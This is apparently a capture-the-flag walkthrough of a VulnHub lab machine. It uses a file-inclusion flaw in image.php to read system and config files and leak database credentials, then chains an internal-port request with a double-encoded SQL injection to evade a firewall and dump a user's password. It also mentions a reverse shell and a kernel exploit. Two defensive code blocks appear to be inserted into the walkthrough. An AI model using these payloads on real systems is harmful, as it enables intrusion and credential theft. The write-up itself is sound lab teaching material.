Like any good pentester, I start off with a quick nmap scan and see what we are working with.


[email protected]:~/Vulnhub/6day# nmap -p- -T4 --min-rate=400 192.168.1.102

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-16 17:55 EDT
Nmap scan report for cypm (192.168.1.102)
Host is up (0.00088s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
8080/tcp filtered http-proxy
MAC Address: 00:0C:29:FB:09:A8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.13 seconds

A few interesting ports; usually where there is 80, there is gold. There are also a few interesting things in the source of the index page. Have a look.

[email protected]:~/Vulnhub/6day# curl -X OPTIONS -v http://192.168.1.102
* Rebuilt URL to: http://192.168.1.102/
*   Trying 192.168.1.102...
* Connected to 192.168.1.102 (192.168.1.102) port 80 (#0)
> OPTIONS / HTTP/1.1
> Host: 192.168.1.102
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 16 Aug 2016 21:56:18 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.23
< Vary: Accept-Encoding
< Content-Length: 1273
< Content-Type: text/html
< 
<html>
<head>
<title>Rashomon IPS - Main Page</title>
</head>
<body>
<h2>Rashomon Intrusion Prevention System</h2>
<h3>Become immune to every attack!</h3>
Today we're announcing our brand new product, Rashomon IPS! <br />
It's capable of blocking any <b>sophisticated cyber attack</b> which <u>can harm your 
precious customers.</u> (you don't want THAT to happen, do you?) <br />
<img 
src="http://192.168.1.102/image.php?src=https%3A%2f%2f4.bp.blogspot.com%2f-u8Jo4CEKQLk%2fV4OpiaoMJ7I%2fAAAAAAAAAiw%2f8kuCpTOpRWUAdp2p4GpegWdnOwxjwHNYQCLcB%2fs1600%2fphoto.jpg" 
/> <br />
(This guy is coming after your website!) <br />
<br />
Don't waste your time and money by hiring <font color="#ff00cc">pentesters</font> and 
doing real security audits. <br />
This is the best way to secure your organization and you can completely rely on it, 
and only it! <br />
<br />
IT'S SO SECURE WE EVEN USE IT ON OUR WEBSITE. <br />
<br />
So be quick and get a <u>%15 discount</u> on our newest product using the promocode 
<b>NONEEDFORPENTEST</b>. (discount will be available until yesterday)<br />
<br />
<form name="promo" method="GET" action="checkpromo.php">
Apply your promo code here: <input type="text" name="promocode">
<input type="submit" value="Apply Promo">
</form>
</body>
</html>
* Connection #0 to host 192.168.1.102 left intact

Do you see it? Yeah, the src attribute of that image tag. It appears to be pulling the image from an external site through image.php. That might be useful…

Image.php

So I suspect there is an LFI/RFI here that could lead us to a shell. First I'll confirm it.

[email protected]:~/Vulnhub/6day# curl -v http://192.168.1.102/image.php?src=/etc/passwd
*   Trying 192.168.1.102...
* Connected to 192.168.1.102 (192.168.1.102) port 80 (#0)
> GET /image.php?src=/etc/passwd HTTP/1.1
> Host: 192.168.1.102
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 16 Aug 2016 22:27:56 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.23
< Content-Length: 1142
< Content-Type: image/jpeg
< 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
andrea:x:1001:1001::/home/andrea:/bin/andrea
* Connection #0 to host 192.168.1.102 left intact

Awesome, we can read /etc/passwd. I tried for shadow but that was a no go. At this point I tried to include my own shells, but sadly none of them would execute. Time to explore further.
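A server-side fix for what image.php is doing, as an added example (this is not the VM's code): only fetch over http(s) from an allowlisted host on a standard port, which rejects the local paths read above and any request aimed at localhost or a non-standard port such as the internal 8080 vhost. The allowlisted host is an assumption taken from the index page's own image URL.

```python
from urllib.parse import urlsplit
import ipaddress

# Assumption: the only remote host the site legitimately loads images from
# (taken from the img src on the index page).
ALLOWED_IMAGE_HOSTS = {"4.bp.blogspot.com"}


def is_allowed_image_src(src: str) -> bool:
    """Return True only for an absolute http(s) URL to an allowlisted host.

    Plain filesystem paths, file:// and php:// wrappers, IP literals,
    localhost and non-standard ports are all rejected before any fetch.
    """
    parts = urlsplit(src)
    if parts.scheme not in ("http", "https"):
        return False                      # rejects /etc/passwd, php://..., file://...
    host = parts.hostname
    if not host:
        return False
    host = host.lower()
    try:
        ipaddress.ip_address(host)        # 127.0.0.1, ::1, 169.254.x.x, ...
        return False                      # never fetch from a raw IP literal
    except ValueError:
        pass                              # not an IP literal, keep checking
    if host == "localhost" or host.endswith(".localhost"):
        return False
    try:
        port = parts.port                 # raises ValueError on a malformed port
    except ValueError:
        return False
    if port not in (None, 80, 443):
        return False                      # blocks the internal :8080 vhost
    return host in ALLOWED_IMAGE_HOSTS
```

A real deployment should also resolve the allowlisted name at fetch time and refuse loopback or private answers, since a hostname check alone does not stop DNS rebinding.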

[email protected]:~/Vulnhub/6day# curl -v "http://192.168.1.102/image.php?src=/etc/apache2/sites-available/default"
*   Trying 192.168.1.102...
* Connected to 192.168.1.102 (192.168.1.102) port 80 (#0)
> GET /image.php?src=/etc/apache2/sites-available/default HTTP/1.1
> Host: 192.168.1.102
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 16 Aug 2016 22:55:27 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.23
< Content-Length: 952
< Content-Type: image/jpeg
< 
<VirtualHost *:8080>
	ServerAdmin [email protected]

	DocumentRoot /var/www
	<Directory />
		Options FollowSymLinks
		AllowOverride None
	</Directory>
	<Directory /var/www/>
		Options Indexes FollowSymLinks MultiViews
		AllowOverride None
		Order allow,deny
		allow from all
	</Directory>

	ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
	<Directory "/usr/lib/cgi-bin">
		AllowOverride None
		Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
		Order allow,deny
		Allow from all
	</Directory>

	ErrorLog ${APACHE_LOG_DIR}/error.log

	# Possible values include: debug, info, notice, warn, error, crit,
	# alert, emerg.
	LogLevel warn

	CustomLog ${APACHE_LOG_DIR}/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>

</VirtualHost>
* Connection #0 to host 192.168.1.102 left intact

========================

[email protected]:~/Vulnhub/6day# curl -v "http://192.168.1.102/image.php?src=/var/www/checkpromo.php"
*   Trying 192.168.1.102...
* Connected to 192.168.1.102 (192.168.1.102) port 80 (#0)
> GET /image.php?src=/var/www/checkpromo.php HTTP/1.1
> Host: 192.168.1.102
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 16 Aug 2016 22:56:21 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.23
< Content-Length: 565
< Content-Type: image/jpeg
< 
<?php
include 'config.php';

$conn = mysql_connect($servername, $username, $password);

if (!$conn) {
	die("Connection failed: " . $conn->connect_error);
}

$sql = "SELECT discount, status FROM promocodes WHERE 
promocode='".$_GET['promocode']."';";

mysql_select_db($dbname);
$result = mysql_query($sql, $conn);

if (!$result) {
	echo "Promocode not valid!";
} else {
	while($row = mysql_fetch_array($result, MYSQL_ASSOC))
	{
		if($row['status'] == 0)
			echo "Code expired!";
		else
			echo "You have %".$row['discount']." discount!";
	}
}

mysql_close($conn);
?>
* Connection #0 to host 192.168.1.102 left intact

=========================

[email protected]:~/Vulnhub/6day# curl -v "http://192.168.1.102/image.php?src=/var/www/config.php"
*   Trying 192.168.1.102...
* Connected to 192.168.1.102 (192.168.1.102) port 80 (#0)
> GET /image.php?src=/var/www/config.php HTTP/1.1
> Host: 192.168.1.102
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 16 Aug 2016 22:57:03 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.23
< Content-Length: 114
< Content-Type: image/jpeg
< 
<?php
$servername = "localhost";
$username = "sellingstuff";
$password = "n0_\$\$_n0_g41ns";
$dbname = "fancydb";
* Connection #0 to host 192.168.1.102 left intact

A few interesting things stand out in these three files. First, the default Apache site config shows that port 8080 is also serving the page, but only allows connections from localhost. My guess from this is that we can likely use it to bypass the WAF/IDS in front of the apparent SQL injection in checkpromo.php. I already know that our injection gets blocked on checkpromo.php?promocode=.

Request Blocked

I also now know the name of the database in play here. Now it’s time to see if I can bypass that WAF/IDS. I tried a few encoding methods but none seemed to work until I ended up with this.

import sys
from urllib.parse import quote_plus

url = sys.argv[1]   # request prefix, up to and including "promocode="
sql = sys.argv[2]   # the injection string to append

# Percent-encode the string, then percent-encode the result again.
enc = quote_plus(sql)
double = quote_plus(enc)
print("[+] Request: " + url + double + "\n")

Yup, that simple. I'm just going to double encode the injection string. From here I had to find the table and column names. Sadly sqlmap was no help, or I was using it wrong (probably the latter). So I just started guessing.
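What the WAF in front of port 80 is missing, as an added example (not the script from the post): a decoder that keeps percent-decoding until the value stops changing, so the double-encoded promocode gets inspected in its final form instead of after one layer, and nested encoding itself becomes a signal. The tiny injection regex is a stand-in for a real rule set and is an assumption.

```python
import re
from urllib.parse import unquote_plus

# The double-encoded promocode value used in the request below.
DOUBLE_ENCODED = ("%2527union%2Ball%2Bselect%2Bconcat%2528username%252C%2527%253A"
                  "%2527%252Cpassword%2529%252C1%2Bfrom%2Bfancydb.users%2523")

# Deliberately small stand-in for a WAF rule set (assumption, not a real one).
SQLI_PATTERN = re.compile(r"(?i)'\s*union\b|\bunion\s+(?:all\s+)?select\b|#\s*$|--")


def decode_to_fixpoint(value, max_rounds=5):
    """Percent-decode repeatedly; return (final value, layers removed).

    max_rounds bounds the work so a pathological input cannot spin forever.
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def looks_like_sqli(value):
    return SQLI_PATTERN.search(value) is not None


def inspect_param(raw):
    """Inspect one query parameter the way a fixed WAF should: on the fully
    decoded value, and with more than one encoding layer flagged on its own."""
    once = unquote_plus(raw)                 # what a single-decode WAF sees
    final, layers = decode_to_fixpoint(raw)
    return {
        "single_decode_flagged": looks_like_sqli(once),
        "flagged": looks_like_sqli(final),
        "nested_encoding": layers > 1,
        "decoded": final,
    }
```

Run against the value above, the single-layer view is clean while the fixpoint view is the union query with a trailing comment, which is exactly the gap the post's script exploits.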

curl -v "http://192.168.1.102/image.php?src=http://localhost:8080/checkpromo.php?promocode=%2527union%2Ball%2Bselect%2Bconcat%2528username%252C%2527%253A%2527%252Cpassword%2529%252C1%2Bfrom%2Bfancydb.users%2523"
*   Trying 192.168.1.102...
* Connected to 192.168.1.102 (192.168.1.102) port 80 (#0)
> GET /image.php?src=http://localhost:8080/checkpromo.php?promocode=%2527union%2Ball%2Bselect%2Bconcat%2528username%252C%2527%253A%2527%252Cpassword%2529%252C1%2Bfrom%2Bfancydb.users%2523 HTTP/1.1
> Host: 192.168.1.102
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Wed, 17 Aug 2016 13:08:57 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.23
< Content-Length: 42
< Content-Type: image/jpeg
< 
* Connection #0 to host 192.168.1.102 left intact
You have %andrea:SayNoToPentests discount!

AWESOME! I now have the password for andrea. I can use those credentials for SSH, but the shell is very limited! I can run commands, but it looks like all output is redirected to /dev/null as I get nothing back. Simple enough to bypass though, if it's truly executing commands: we'll just pop a reverse shell in there.

Getting Shell

And now we have ourselves a pretty little shell.

Low Priv

Now all that's left is to escalate. This was the easy part. The version of Ubuntu appeared vulnerable to a common overlayfs exploit.

Getting Root

VICTORY

Flag